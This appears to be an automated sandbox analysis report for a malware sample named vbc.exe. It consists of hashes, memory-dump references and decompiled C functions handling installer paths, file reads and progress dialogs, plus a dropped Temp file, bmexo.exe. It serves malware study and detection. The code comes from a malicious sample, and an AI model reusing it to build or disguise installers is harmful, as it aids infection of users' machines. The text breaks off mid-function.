                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F
                                          • API String ID: 941294808-1304234792
                                          • Opcode ID: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                                          • Instruction ID: 97a6e5849d711934decb320d9e1447055a7c39d586dd296ee09aa65e352ff849
                                          • Opcode Fuzzy Hash: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                                          • Instruction Fuzzy Hash: 83418C71800209AFCF058F95CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E004066AB(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                          				struct _ITEMIDLIST* _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _t44;
                                          				WCHAR* _t45;
                                          				signed char _t47;
                                          				signed int _t48;
                                          				short _t59;
                                          				short _t61;
                                          				short _t63;
                                          				void* _t71;
                                          				signed int _t77;
                                          				signed int _t78;
                                          				short _t81;
                                          				short _t82;
                                          				signed char _t84;
                                          				signed int _t85;
                                          				void* _t98;
                                          				void* _t104;
                                          				intOrPtr* _t105;
                                          				void* _t107;
                                          				WCHAR* _t108;
                                          				void* _t110;
                                          
                                          				_t107 = __esi;
                                          				_t104 = __edi;
                                          				_t71 = __ebx;
                                          				_t44 = _a8;
                                          				if(_t44 < 0) {
                                          					_t44 =  *( *0x7a7a7c - 4 + _t44 * 4);
                                          				}
                                          				_push(_t71);
                                          				_push(_t107);
                                          				_push(_t104);
                                          				_t105 =  *0x7a8ad8 + _t44 * 2;
                                          				_t45 = 0x7a6a40;
                                          				_t108 = 0x7a6a40;
                                          				if(_a4 >= 0x7a6a40 && _a4 - 0x7a6a40 >> 1 < 0x800) {
                                          					_t108 = _a4;
                                          					_a4 = _a4 & 0x00000000;
                                          				}
                                          				_t81 =  *_t105;
                                          				_a8 = _t81;
                                          				if(_t81 == 0) {
                                          					L43:
                                          					 *_t108 =  *_t108 & 0x00000000;
                                          					if(_a4 == 0) {
                                          						return _t45;
                                          					}
                                          					return E0040666E(_a4, _t45);
                                          				} else {
                                          					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                          						_t98 = 2;
                                          						_t105 = _t105 + _t98;
                                          						if(_t81 >= 4) {
                                          							if(__eflags != 0) {
                                          								 *_t108 = _t81;
                                          								_t108 = _t108 + _t98;
                                          								__eflags = _t108;
                                          							} else {
                                          								 *_t108 =  *_t105;
                                          								_t108 = _t108 + _t98;
                                          								_t105 = _t105 + _t98;
                                          							}
                                          							L42:
                                          							_t82 =  *_t105;
                                          							_a8 = _t82;
                                          							if(_t82 != 0) {
                                          								_t81 = _a8;
                                          								continue;
                                          							}
                                          							goto L43;
                                          						}
                                          						_t84 =  *((intOrPtr*)(_t105 + 1));
                                          						_t47 =  *_t105;
                                          						_t48 = _t47 & 0x000000ff;
                                          						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                          						_t85 = _t84 & 0x000000ff;
                                          						_v28 = _t48 | 0x00008000;
                                          						_t77 = 2;
                                          						_v16 = _t85;
                                          						_t105 = _t105 + _t77;
                                          						_v24 = _t48;
                                          						_v20 = _t85 | 0x00008000;
                                          						if(_a8 != _t77) {
                                          							__eflags = _a8 - 3;
                                          							if(_a8 != 3) {
                                          								__eflags = _a8 - 1;
                                          								if(__eflags == 0) {
                                          									__eflags = (_t48 | 0xffffffff) - _v12;
                                          									E004066AB(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                          								}
                                          								L38:
                                          								_t108 =  &(_t108[lstrlenW(_t108)]);
                                          								_t45 = 0x7a6a40;
                                          								goto L42;
                                          							}
                                          							_t78 = _v12;
                                          							__eflags = _t78 - 0x1d;
                                          							if(_t78 != 0x1d) {
                                          								__eflags = (_t78 << 0xb) + 0x7a9000;
                                          								E0040666E(_t108, (_t78 << 0xb) + 0x7a9000);
                                          							} else {
                                          								E004065B5(_t108,  *0x7a8aa8);
                                          							}
                                          							__eflags = _t78 + 0xffffffeb - 7;
                                          							if(__eflags < 0) {
                                          								L29:
                                          								E004068F5(_t108);
                                          							}
                                          							goto L38;
                                          						}
                                          						if( *0x7a8b24 != 0) {
                                          							_t77 = 4;
                                          						}
                                          						_t121 = _t48;
                                          						if(_t48 >= 0) {
                                          							__eflags = _t48 - 0x25;
                                          							if(_t48 != 0x25) {
                                          								__eflags = _t48 - 0x24;
                                          								if(_t48 == 0x24) {
                                          									GetWindowsDirectoryW(_t108, 0x400);
                                          									_t77 = 0;
                                          								}
                                          								while(1) {
                                          									__eflags = _t77;
                                          									if(_t77 == 0) {
                                          										goto L26;
                                          									}
                                          									_t59 =  *0x7a8aa4;
                                          									_t77 = _t77 - 1;
                                          									__eflags = _t59;
                                          									if(_t59 == 0) {
                                          										L22:
                                          										_t61 = SHGetSpecialFolderLocation( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                          										__eflags = _t61;
                                          										if(_t61 != 0) {
                                          											L24:
                                          											 *_t108 =  *_t108 & 0x00000000;
                                          											__eflags =  *_t108;
                                          											continue;
                                          										}
                                          										__imp__SHGetPathFromIDListW(_v8, _t108);
                                          										_a8 = _t61;
                                          										__imp__CoTaskMemFree(_v8);
                                          										__eflags = _a8;
                                          										if(_a8 != 0) {
                                          											goto L26;
                                          										}
                                          										goto L24;
                                          									}
                                          									_t63 =  *_t59( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                          									__eflags = _t63;
                                          									if(_t63 == 0) {
                                          										goto L26;
                                          									}
                                          									goto L22;
                                          								}
                                          								goto L26;
                                          							}
                                          							GetSystemDirectoryW(_t108, 0x400);
                                          							goto L26;
                                          						} else {
                                          							E0040653C( *0x7a8ad8, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8ad8 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                          							if( *_t108 != 0) {
                                          								L27:
                                          								if(_v16 == 0x1a) {
                                          									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                          								}
                                          								goto L29;
                                          							}
                                          							E004066AB(_t77, _t105, _t108, _t108, _v16);
                                          							L26:
                                          							if( *_t108 == 0) {
                                          								goto L29;
                                          							}
                                          							goto L27;
                                          						}
                                          					}
                                          					goto L43;
                                          				}
                                          			}

                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000400), ref: 004067C6
                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000400,00000000,007A0F68,?,00405707,007A0F68,00000000,00000000,00000000,00000000), ref: 004067D9
                                          • lstrcatW.KERNEL32 ref: 00406850
                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Directory$SystemWindowslstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 4260037668-1458657875
                                          • Opcode ID: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                                          • Instruction ID: c9eaf07520507b798c7259a568fd9567d3c8f5a418c476a208567326fda18bee
                                          • Opcode Fuzzy Hash: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                                          • Instruction Fuzzy Hash: F061FF72902115AADF10AF68CC40BAE37A5AF55314F22C03FE947B62D0DB3D49A5CB89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00404631(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                          				struct tagLOGBRUSH _v16;
                                          				long _t39;
                                          				long _t41;
                                          				void* _t44;
                                          				signed char _t50;
                                          				long* _t54;
                                          
                                          				if(_a4 + 0xfffffecd > 5) {
                                          					L18:
                                          					return 0;
                                          				}
                                          				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                          				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                          					goto L18;
                                          				} else {
                                          					_t50 = _t54[5];
                                          					if((_t50 & 0xffffffe0) != 0) {
                                          						goto L18;
                                          					}
                                          					_t39 =  *_t54;
                                          					if((_t50 & 0x00000002) != 0) {
                                          						_t39 = GetSysColor(_t39);
                                          					}
                                          					if((_t54[5] & 0x00000001) != 0) {
                                          						SetTextColor(_a8, _t39);
                                          					}
                                          					SetBkMode(_a8, _t54[4]);
                                          					_t41 = _t54[1];
                                          					_v16.lbColor = _t41;
                                          					if((_t54[5] & 0x00000008) != 0) {
                                          						_t41 = GetSysColor(_t41);
                                          						_v16.lbColor = _t41;
                                          					}
                                          					if((_t54[5] & 0x00000004) != 0) {
                                          						SetBkColor(_a8, _t41);
                                          					}
                                          					if((_t54[5] & 0x00000010) != 0) {
                                          						_v16.lbStyle = _t54[2];
                                          						_t44 = _t54[3];
                                          						if(_t44 != 0) {
                                          							DeleteObject(_t44);
                                          						}
                                          						_t54[3] = CreateBrushIndirect( &_v16);
                                          					}
                                          					return _t54[3];
                                          				}
                                          			}


                                          APIs
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                          • Instruction ID: 80d2dfdfbb5be5877469216c844a522b7394a6fa1e0a99176855ee87e7478973
                                          • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                          • Instruction Fuzzy Hash: EC2179B15007049BC730DF68D908B5BBBF8AF41714F048E2EE9D6A26E1E739D944DB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                          				intOrPtr _t65;
                                          				intOrPtr _t66;
                                          				intOrPtr _t72;
                                          				void* _t76;
                                          				void* _t79;
                                          
                                          				_t72 = __edx;
                                          				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                          				_t65 = 2;
                                          				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                          				_t66 = E00402D84(_t65);
                                          				_t79 = _t66 - 1;
                                          				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                          				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                          				if(_t79 < 0) {
                                          					L36:
                                          					 *0x7a8b28 =  *0x7a8b28 +  *(_t76 - 4);
                                          				} else {
                                          					__ecx = 0x3ff;
                                          					if(__eax > 0x3ff) {
                                          						 *(__ebp - 0x44) = 0x3ff;
                                          					}
                                          					if( *__edi == __bx) {
                                          						L34:
                                          						__ecx =  *(__ebp - 0xc);
                                          						__eax =  *(__ebp - 8);
                                          						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                          						if(_t79 == 0) {
                                          							 *(_t76 - 4) = 1;
                                          						}
                                          						goto L36;
                                          					} else {
                                          						 *(__ebp - 0x38) = __ebx;
                                          						 *(__ebp - 0x18) = E004065CE(__ecx, __edi);
                                          						if( *(__ebp - 0x44) > __ebx) {
                                          							do {
                                          								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                          									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040623F( *(__ebp - 0x18), __ebx) >= 0) {
                                          										__eax = __ebp - 0x50;
                                          										if(E004061E1( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                          											goto L34;
                                          										} else {
                                          											goto L21;
                                          										}
                                          									} else {
                                          										goto L34;
                                          									}
                                          								} else {
                                          									__eax = __ebp - 0x40;
                                          									_push(__ebx);
                                          									_push(__ebp - 0x40);
                                          									__eax = 2;
                                          									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                          									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                          									if(__eax == 0) {
                                          										goto L34;
                                          									} else {
                                          										__ecx =  *(__ebp - 0x40);
                                          										if(__ecx == __ebx) {
                                          											goto L34;
                                          										} else {
                                          											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                          											 *(__ebp - 0x4c) = __ecx;
                                          											 *(__ebp - 0x50) = __eax;
                                          											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                          												L28:
                                          												__ax & 0x0000ffff = E004065B5( *(__ebp - 0xc), __ax & 0x0000ffff);
                                          											} else {
                                          												__ebp - 0x50 = __ebp + 0xa;
                                          												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                          													L21:
                                          													__eax =  *(__ebp - 0x50);
                                          												} else {
                                          													__edi =  *(__ebp - 0x4c);
                                          													__edi =  ~( *(__ebp - 0x4c));
                                          													while(1) {
                                          														_t22 = __ebp - 0x40;
                                          														 *_t22 =  *(__ebp - 0x40) - 1;
                                          														__eax = 0xfffd;
                                          														 *(__ebp - 0x50) = 0xfffd;
                                          														if( *_t22 == 0) {
                                          															goto L22;
                                          														}
                                          														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                          														__edi = __edi + 1;
                                          														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                          														__eax = __ebp + 0xa;
                                          														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                          															continue;
                                          														} else {
                                          															goto L21;
                                          														}
                                          														goto L22;
                                          													}
                                          												}
                                          												L22:
                                          												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                          													goto L28;
                                          												} else {
                                          													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                          														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                          															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                          															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                          														} else {
                                          															__ecx =  *(__ebp - 0xc);
                                          															__edx =  *(__ebp - 8);
                                          															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                          															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                          														}
                                          														goto L34;
                                          													} else {
                                          														__ecx =  *(__ebp - 0xc);
                                          														__edx =  *(__ebp - 8);
                                          														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                          														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                          														 *(__ebp - 0x38) = __eax;
                                          														if(__ax == __bx) {
                                          															goto L34;
                                          														} else {
                                          															goto L26;
                                          														}
                                          													}
                                          												}
                                          											}
                                          										}
                                          									}
                                          								}
                                          								goto L37;
                                          								L26:
                                          								__eax =  *(__ebp - 8);
                                          							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                          						}
                                          						goto L34;
                                          					}
                                          				}
                                          				L37:
                                          				return 0;
                                          			}


                                          APIs
                                          • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                            • Part of subcall function 0040623F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406255
                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                          Strings
                                          Similarity
                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                          • String ID: 9
                                          • API String ID: 163830602-2366072709
                                          • Opcode ID: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                                          • Instruction ID: 3e360b617c3737f2e779930334e882a7207aef4f73e2c1e076e29b282e1bb3de
                                          • Opcode Fuzzy Hash: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                                          • Instruction Fuzzy Hash: 60510B75D00219ABDF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004056D0(signed int _a4, WCHAR* _a8) {
                                          				struct HWND__* _v8;
                                          				signed int _v12;
                                          				WCHAR* _v32;
                                          				long _v44;
                                          				int _v48;
                                          				void* _v52;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				WCHAR* _t27;
                                          				signed int _t28;
                                          				long _t29;
                                          				signed int _t37;
                                          				signed int _t38;
                                          
                                          				_t27 =  *0x7a7a84;
                                          				_v8 = _t27;
                                          				if(_t27 != 0) {
                                          					_t37 =  *0x7a8b54;
                                          					_v12 = _t37;
                                          					_t38 = _t37 & 0x00000001;
                                          					if(_t38 == 0) {
                                          						E004066AB(_t38, 0, 0x7a0f68, 0x7a0f68, _a4);
                                          					}
                                          					_t27 = lstrlenW(0x7a0f68);
                                          					_a4 = _t27;
                                          					if(_a8 == 0) {
                                          						L6:
                                          						if((_v12 & 0x00000004) == 0) {
                                          							_t27 = SetWindowTextW( *0x7a7a68, 0x7a0f68);
                                          						}
                                          						if((_v12 & 0x00000002) == 0) {
                                          							_v32 = 0x7a0f68;
                                          							_v52 = 1;
                                          							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                          							_v44 = 0;
                                          							_v48 = _t29 - _t38;
                                          							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                          							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                          						}
                                          						if(_t38 != 0) {
                                          							_t28 = _a4;
                                          							0x7a0f68[_t28] = 0;
                                          							return _t28;
                                          						}
                                          					} else {
                                          						_t27 = lstrlenW(_a8) + _a4;
                                          						if(_t27 < 0x1000) {
                                          							_t27 = lstrcatW(0x7a0f68, _a8);
                                          							goto L6;
                                          						}
                                          					}
                                          				}
                                          				return _t27;
                                          			}

                                          APIs
                                          • lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                          • lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                          • lstrcatW.KERNEL32 ref: 0040572B
                                          • SetWindowTextW.USER32 ref: 0040573D
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                            • Part of subcall function 004066AB: lstrcatW.KERNEL32 ref: 00406850
                                            • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                          • String ID:
                                          • API String ID: 1495540970-0
                                          • Opcode ID: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                                          • Instruction ID: b1df74b24ef97eccf04675f52fbaffa54a328febca5869b92639b2b84e823bb6
                                          • Opcode Fuzzy Hash: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                                          • Instruction Fuzzy Hash: 32219D71900518FACF119FA5DD84ACFBFB8EF85350F10842AF904B6290C7794A40DFA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E004068F5(WCHAR* _a4) {
                                          				short _t5;
                                          				short _t7;
                                          				WCHAR* _t19;
                                          				WCHAR* _t20;
                                          				WCHAR* _t21;
                                          
                                          				_t20 = _a4;
                                          				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                          					_t20 =  &(_t20[4]);
                                          				}
                                          				if( *_t20 != 0 && E00405FB4(_t20) != 0) {
                                          					_t20 =  &(_t20[2]);
                                          				}
                                          				_t5 =  *_t20;
                                          				_t21 = _t20;
                                          				_t19 = _t20;
                                          				if(_t5 != 0) {
                                          					do {
                                          						if(_t5 > 0x1f &&  *((short*)(E00405F6A(L"*?|<>/\":", _t5))) == 0) {
                                          							E00406119(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                          							_t19 = CharNextW(_t19);
                                          						}
                                          						_t20 = CharNextW(_t20);
                                          						_t5 =  *_t20;
                                          					} while (_t5 != 0);
                                          				}
                                          				 *_t19 =  *_t19 & 0x00000000;
                                          				while(1) {
                                          					_push(_t19);
                                          					_push(_t21);
                                          					_t19 = CharPrevW();
                                          					_t7 =  *_t19;
                                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                                          						break;
                                          					}
                                          					 *_t19 =  *_t19 & 0x00000000;
                                          					if(_t21 < _t19) {
                                          						continue;
                                          					}
                                          					break;
                                          				}
                                          				return _t7;
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 589700163-3083651966
                                          • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                          • Instruction ID: be6858c8d4b602c62de40fdc636a35535680886f1e3ed17f643e47e9e10769a1
                                          • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                          • Instruction Fuzzy Hash: 0D11E6A580060295DB302B148C40A7762E8AF94750F12403FE98AB36C1E7BC4CA2C6BD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040302E(intOrPtr _a4) {
                                          				short _v132;
                                          				long _t6;
                                          				struct HWND__* _t7;
                                          				struct HWND__* _t15;
                                          
                                          				if(_a4 != 0) {
                                          					_t15 =  *0x79f73c;
                                          					if(_t15 != 0) {
                                          						_t15 = DestroyWindow(_t15);
                                          					}
                                          					 *0x79f73c = 0;
                                          					return _t15;
                                          				}
                                          				if( *0x79f73c != 0) {
                                          					return E00406A77(0);
                                          				}
                                          				_t6 = GetTickCount();
                                          				if(_t6 >  *0x7a8aac) {
                                          					if( *0x7a8aa8 == 0) {
                                          						_t7 = CreateDialogParamW( *0x7a8aa0, 0x6f, 0, E00402F93, 0);
                                          						 *0x79f73c = _t7;
                                          						return ShowWindow(_t7, 5);
                                          					}
                                          					if(( *0x7a8b54 & 0x00000001) != 0) {
                                          						wsprintfW( &_v132, L"... %d%%", E00403012());
                                          						return E004056D0(0,  &_v132);
                                          					}
                                          				}
                                          				return _t6;
                                          			}

                                          APIs
                                          • DestroyWindow.USER32 ref: 00403049
                                          • GetTickCount.KERNEL32(00000000), ref: 00403067
                                          • wsprintfW.USER32 ref: 00403095
                                            • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                            • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                            • Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
                                            • Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                          • CreateDialogParamW.USER32 ref: 004030B9
                                          • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                            • Part of subcall function 00403012: MulDiv.KERNEL32 ref: 00403027
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                          • String ID: ... %d%%
                                          • API String ID: 722711167-2449383134
                                          • Opcode ID: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                                          • Instruction ID: 36a9105e1bf518e5a00a94211bbaadb265df24d4843d4ed97aac6270594080be
                                          • Opcode Fuzzy Hash: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                                          • Instruction Fuzzy Hash: 40015B70413610ABC7217FA0AD49A9A7FACAB01B06F50853BF441F25E9DA7C46458B9E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00404F85(struct HWND__* _a4, intOrPtr _a8) {
                                          				long _v8;
                                          				signed char _v12;
                                          				unsigned int _v16;
                                          				void* _v20;
                                          				intOrPtr _v24;
                                          				long _v56;
                                          				void* _v60;
                                          				long _t15;
                                          				unsigned int _t19;
                                          				signed int _t25;
                                          				struct HWND__* _t28;
                                          
                                          				_t28 = _a4;
                                          				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                          				if(_a8 == 0) {
                                          					L4:
                                          					_v56 = _t15;
                                          					_v60 = 4;
                                          					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                          					return _v24;
                                          				}
                                          				_t19 = GetMessagePos();
                                          				_v16 = _t19 >> 0x10;
                                          				_v20 = _t19;
